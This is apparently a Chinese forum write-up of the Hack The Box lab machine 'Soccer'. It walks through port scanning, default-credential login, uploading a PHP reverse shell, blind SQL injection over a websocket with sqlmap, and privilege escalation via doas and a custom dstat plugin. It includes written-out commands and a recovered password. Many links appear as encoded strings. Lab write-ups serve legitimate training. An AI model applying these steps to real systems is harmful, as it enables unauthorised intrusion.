首页
社区
课程
招聘
[原创] HTB Soccer (EASY)
发表于: 2022-12-25 23:29 1624

[原创] HTB Soccer (EASY)

2022-12-25 23:29
1624

参考链接:
f07K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0k6h3!0%4L8h3g2G2N6$3q4@1N6r3q4U0K9#2)9J5k6h3N6A6N6r3S2#2j5W2)9J5k6h3W2G2i4K6u0r3K9s2c8T1i4K6u0r3M7$3!0U0j5$3g2J5i4K6u0r3
还是先扫端口

图片描述
vim /etc/hosts 写入
跑一下目录

图片描述
de7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5$3y4W2M7W2)9J5k6h3S2@1j5W2)9J5c8Y4c8A6L8Y4W2Q4x3V1j5`.
图片描述
图片描述
跑出来一个1abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5$3y4W2M7W2)9J5k6h3S2@1j5W2)9J5c8Y4c8A6L8Y4W2Q4x3V1k6#2M7r3I4G2j5h3c8K6i4K6u0r3 访问不了,先放着
可以看到网站是H3K的,经过搜索发现是github上的开源项目
595K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6H3M7X3q4K6j5i4c8Z5L8h3q4F1K9g2)9J5c8Y4c8A6L8Y4W2X3K9h3I4W2L8h3q4F1j5h3N6W2M7R3`.`.
图片描述
试一下默认的账号密码admin:admin@123 成功登录
图片描述
在uploads目录上传一个shell
/usr/share/webshells/php/php-reverse-shell.php
图片描述
图片描述
图片描述
成功上传了shell 之后网页访问
657K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5$3y4W2M7W2)9J5k6h3S2@1j5W2)9J5c8Y4c8A6L8Y4W2Q4x3V1k6#2M7r3I4G2j5h3c8K6i4K6u0r3N6r3#2H3i4K6u0r3N6#2)9J5k6i4m8Z5M7l9`.`.
图片描述
图片描述
成功登上靶机
检查nginx ls /etc/nginx/sites-available/发现有服务soc-player.soccer.htb
图片描述
69cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5#2)9J5k6s2m8D9j5i4W2W2M7W2)9J5k6i4y4G2j5$3y4W2M7W2)9J5k6h3S2@1j5W2)9J5c8Y4y4A6k6$3&6#2M7l9`.`.
创建一个帐户,然后登录
登录后,看到页面c8aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5#2)9J5k6s2m8D9j5i4W2W2M7W2)9J5k6i4y4G2j5$3y4W2M7W2)9J5k6h3S2@1j5W2)9J5c8X3y4Z5k6h3y4C8i4@1f1$3i4K6W2o6i4K6R3&6i4@1f1@1i4@1t1^5i4K6R3H3i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1%4i4@1p5#2i4@1p5^5i4@1f1^5i4@1q4r3i4K6R3I4i4@1f1$3i4@1p5K6i4K6R3H3i4@1f1$3i4K6W2r3i4@1p5#2i4@1f1$3i4K6W2o6i4@1u0m8i4@1f1#2i4K6R3^5i4@1t1$3i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1#2i4K6S2r3i4@1q4r3i4@1f1@1i4@1u0n7i4@1p5#2i4@1f1#2i4K6W2o6i4@1p5^5i4@1f1#2i4K6R3#2i4@1t1$3i4@1f1@1i4@1t1^5i4@1q4p5i4@1f1$3i4K6V1H3i4K6W2o6i4@1f1%4i4@1t1@1i4@1p5J5i4@1f1%4i4@1p5#2i4@1p5^5i4@1f1^5i4@1q4r3i4K6R3I4i4@1f1K6i4K6R3H3i4K6R3J5i4@1f1$3i4@1p5K6i4K6R3H3i4@1f1$3i4K6W2r3i4@1p5#2 html 源代码发现此功能连接到 websocket
图片描述

站点可能存在sqli漏洞。搜索sqli websocket可找到这篇文章:
https ://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
我们可以使用帖子中的 python 脚本作为代理,将 sqlmap 请求转发到 localhost:8081(在 python 脚本中定义)到目标主机的 websocket 端口 9091。为了使我们的设置工作,我们需要修改脚本

图片描述
图片描述

图片描述

--flush-session清除缓存 --technique B 布尔注入
图片描述

图片描述
图片描述
图片描述
使用账号密码登录player PlayerOftheMatch2022
ssh player@10.10.11.194
图片描述
使用linPEAS工具辅助提权
a8bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4N6W2K9i4S2A6L8W2)9#2k6U0b7K6y4e0M7I4y4U0b7I4i4K6u0r3j5i4u0@1K9h3y4D9k6g2)9J5c8X3c8W2N6r3q4A6L8s2y4Q4x3V1j5I4x3U0b7K6y4K6b7I4x3e0M7`.
b17K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6U0j5i4u0D9L8%4y4H3L8$3I4G2M7q4)9J5c8W2m8q4b7g2y4e0i4K6u0V1L8X3M7`.
8e7K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6U0j5i4u0D9L8%4y4H3L8$3I4G2M7q4)9J5c8W2m8q4b7g2y4e0i4K6u0V1L8X3N6Q4x3V1k6J5k6h3I4W2j5i4y4W2M7#2)9J5c8X3c8G2N6$3&6D9L8$3q4V1i4K6u0r3x3U0l9J5x3U0p5J5x3U0g2Q4x3V1k6D9K9h3&6H3k6h3q4K6i4K6u0W2M7$3R3`.
这样执行不会留下记录,本地要python3 -m http.server 80

脚本执行后可以看到很多东西
图片描述
图片描述
值得注意的是Doas
这个帖子中有关于其提权的东西
6c5K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8$3!0C8i4K6u0W2K9r3q4U0K9%4c8J5K9h3y4C8M7#2)9J5k6i4S2&6P5W2)9J5c8X3I4A6L8Y4g2^5i4K6u0V1K9r3q4J5k6r3g2F1K9h3&6Y4i4K6u0r3M7s2u0A6N6X3W2D9k6h3N6W2i4K6u0V1k6i4y4U0j5h3I4S2N6r3W2G2L8W2)9J5x3$3c8G2j5i4x3`.

图片描述
man dstat查看dstat的手册
图片描述
可以使用自定义plugin,以dstat_开头
图片描述

图片描述

图片描述

rustscan 10.10.11.194
rustscan 10.10.11.194
dirsearch -u http://soccer.htb/ -x 403,401 -w /usr/share/wordlists/dirb/big.txt
dirsearch -u http://soccer.htb/ -x 403,401 -w /usr/share/wordlists/dirb/big.txt
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
ws_server = "ws://soc-player.soccer.htb:9091" # line: 6
...
data = '{"id":"%s"}' % message # line: 15, this format can be found by inspecting the traffic and see the search response
ws_server = "ws://soc-player.soccer.htb:9091" # line: 6
...
data = '{"id":"%s"}' % message # line: 15, this format can be found by inspecting the traffic and see the search response
python  socer.py
sqlmap -u "http://localhost:8081/?id=1" -p "id"
python  socer.py
sqlmap -u "http://localhost:8081/?id=1" -p "id"
sqlmap -u "http://localhost:8081/?id=1" -p "id" --batch --dbs
sqlmap -u "http://localhost:8081/?id=1" -p "id" --batch --dbs
sqlmap -u http://localhost:8081/?id=1 -p id  --random-agent --dbms mysql --dbs --technique B --level 5 --risk 3 -t 5 --flush-session
sqlmap -u http://localhost:8081/?id=1 -p id  --random-agent --dbms mysql --dbs --technique B --level 5 --risk 3 -t 5 --flush-session
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[*] information_schema
[*] mysql
[*] performance_schema

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

最后于 2022-12-29 14:26 被hml189编辑 ,原因:
收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回